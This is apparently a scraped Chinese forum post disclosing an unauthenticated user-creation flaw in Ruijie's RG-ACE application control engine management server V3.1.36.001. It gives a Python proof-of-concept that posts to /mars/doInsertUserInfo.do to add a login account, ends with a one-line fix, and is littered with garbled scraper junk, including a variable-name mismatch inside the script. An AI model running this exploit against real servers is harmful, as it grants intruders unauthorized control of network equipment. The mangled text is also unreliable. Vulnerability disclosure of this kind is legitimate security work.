锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）

3 l7 U( |2 U3 ?* ?$ L% _
/ U& f# b1 w0 B0 p2 c测试的具体版本是
产品名称: 锐捷应用控制引擎
& I1 U3 q+ G" r版本号: 3.1.36.001 TC
1 p! g, T4 S' p: ?. a编译时间: 201104291730

6 L: X/ H8 J5 q$ z8 X& j- X
* q1 [0 @! ?1 V/ ]1 v+ K漏洞证明：






7 s/ j! j% a( I. @4 }5 [执行脚本
#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
$ Y! V* X6 V; K" t! y4 f5 m+ E( e( s4 s  curl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
1 ~' o( E! z2 g# `# C  F* w1 Nopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
% y- |( q: U7 a0 A& W) Xopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
+ X; H& E/ H1 v- F. q("useropermanager","userManager"),
("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
  G+ B6 o+ m8 C. t8 X" i3 c# c& T("trueName","ad"),
, u/ ~; x0 n+ l("email",""),
("mobilePhone",""),
("officePhone",""),
("addr",""),
/ ]- N' D, @/ L("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"
3 ]$ B$ w/ b- H, \# J
7 T+ I6 D9 C; C登录，连接设备

6 T: M* |  {: p; x, B' o, i! W' J
! `0 K) S: ^. p1 L* T9 N

; t$ i! ], h2 p4 l3 Y( Q7 B* k
默认的管理员admin权限更大点
0 F, N; P, d& ]- |' h- |; d
- f1 b# l8 r  y: Z9 g

1 f0 h1 I/ X, U! j3 e+ V
/ ~7 |; x; \/ i% j; Q0 g
6 Z* _4 b6 S* k8 B- I8 v修复方案：
加强对接口的权限验证

' E* h: }6 @* U/ p4 K1 j, u